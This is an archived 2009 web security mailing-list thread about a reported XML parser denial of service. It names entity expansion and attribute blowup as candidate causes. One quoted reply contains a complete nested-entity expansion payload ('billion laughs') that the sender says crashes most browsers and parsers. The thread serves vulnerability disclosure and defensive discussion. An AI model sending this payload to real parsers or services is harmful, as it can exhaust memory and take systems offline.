[WEB SECURITY] Multi Vendor XML parser DOS Details?

Amit Klein amit.klein at trusteer.com
Fri Aug 7 12:34:30 EDT 2009


Weird. I thought most parsers already fixed this one after my 2002
disclosure (http://www.securityfocus.com/archive/1/303509) 

> -----Original Message-----
> From: Achim Hoffmann [mailto:ah at securenet.de] 
> Sent: Friday, August 07, 2009 11:04
> To: robert at webappsec.org
> Cc: websecurity at webappsec.org
> Subject: Re: [WEB SECURITY] Multi Vendor XML parser DOS Details?
> 
> robert at webappsec.org wrote on 06.08.2009 20:36:
> > There's been news about a new XML Parser Denial of Service 
> that seems to affect multiple products.
> > Unfortunately I haven't seen any technical details as to what the 
> > issue is, does anyone know what it is exactly?
> > 
> > I'm thinking one of the following?
> > 
> > XML Attribute Blowup (WASC TCv2)
> > http://projects.webappsec.org/XML-Attribute-Blowup
> > 
> > XML Entity Expansion (WASC TCv2)
> > http://projects.webappsec.org/XML-Entity-Expansion
> 
> Hi Robert,
> 
> my example (see below) crashes most browsers and probably 
> also most XML parsers (SAX, Xerces, etc.). For the parsers, 
> please someone out there to test which one is affected (as I 
> don't have a proper test environment).
> 
> Achim
> --
> 
> 
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE bang [
> <!ENTITY x0 "Hare Krishna">
> <!ENTITY x1 "&x0;&x0;&x0;">
> <!ENTITY x2 "&x1;&x1;&x1;">
> <!ENTITY x3 "&x2;&x2;&x2;">
> <!ENTITY x4 "&x3;&x3;&x3;">
> <!ENTITY x5 "&x4;&x4;&x4;">
> <!ENTITY x6 "&x5;&x5;&x5;">
> <!ENTITY x7 "&x6;&x6;&x6;">
> <!ENTITY x8 "&x7;&x7;&x7;">
> <!ENTITY x9 "&x8;&x8;&x8;">
> <!ENTITY x10 "&x9;&x9;&x9;">
> <!ENTITY x11 "&x10;&x10;&x10;">
> <!ENTITY x12 "&x11;&x11;&x11;">
> <!ENTITY x13 "&x12;&x12;&x12;">
> <!ENTITY x14 "&x13;&x13;&x13;">
> <!ENTITY x15 "&x14;&x14;&x14;">
> <!ENTITY x16 "&x15;&x15;&x15;">
> <!ENTITY x17 "&x16;&x16;&x16;">
> <!ENTITY x18 "&x17;&x17;&x17;">
> <!ENTITY x19 "&x18;&x18;&x18;">
> ]>
> <bang>&x19;</bang>
> 
> 
> --------------------------------------------------------------
> --------------
> Join us on IRC: irc.freenode.net #webappsec
> 
> Have a question? Search The Web Security Mailing List Archives: 
> http://www.webappsec.org/lists/websecurity/archive/
> 
> Subscribe via RSS: 
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
> 
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
> 
> 

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list